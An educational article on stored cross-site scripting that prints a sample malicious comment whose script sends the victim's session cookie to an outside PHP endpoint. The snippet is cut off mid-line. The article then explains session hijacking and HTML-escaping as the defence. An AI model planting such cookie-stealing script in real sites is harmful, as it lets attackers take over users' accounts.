“I'm not afraid of failing; that's the only way to reach success.” - Nuno Peralta

Internet Attacks on Websites

« Introduction
Cross-Site Request Forgery (CSRF) »

Cross Site Scripting (XSS)

There are websites where people may write something that will be displayed to public, such as comments on a social networking site. If the text is not verified and validated, or filtered, then it will be pasted on the HTML code of the page exactly as the user wrote it. This means that if the user wrote HTML code on the comment, then the HTML will be interpreted by the browser.

Here is an example of a comment that the hacker could write on the profile of the victim:

Hello my best friend!
<script type="text/javascript">
var js = document.createElement('script');
js.setAttribute('type', 'text/javascript');
js.setAttribute('src', 'http://www.mysite.com/store_database.php?cookie='

The victim will just see the text “Hello my best friend!” on the comment. The JavaScript code in the HTML will be hidden and interpreted by the browser. Notice the “document.cookie”. This is variable has the cookie of the victim on that site, and this code will add a new JavaScript file to the page where the reader of the comment is. The contents of that JavaScript file don’t really matter here. Actually, we are not even including a JavaScript file, we are calling a PHP process. But, the browser doesn’t know it, and will have to request it to know. What matters here, is that the cookie is sent by an input parameter, and the process “store_database.php” can store this value in the database, together with other information that the browser automatically sends in the request headers. Once the hacker has the victim’s cookie on the database, all he needs to do is to replace his cookie by the victim’s one, and then the hacker will be using the site in the behalf of the victim, being able to do whatever he wants.

The way to avoid this, is to filter the special HTML characters when pasting the comments on the website. The process will have to replace "<" with "&lt;", ">" with "&gt;", and some other optional characters. This will make the hacker’s HTML code not being interpreted by the browser, and will be shown as plain text in the comment, instead.

Until 2007, the social network hi5 was not filtering HTML at all and had lots of these attacks. Eventually they started to filter some HTML expressions, which were known to be dangerous, but, they wanted to keep allowing some basic HTML, such as inserting an image. However, even basic HTML can be very dangerous, using the Event Handlers. These handlers allow a JavaScript function to be called on some event, such as when user clicks on the element.

Article written by Nuno Peralta, 2012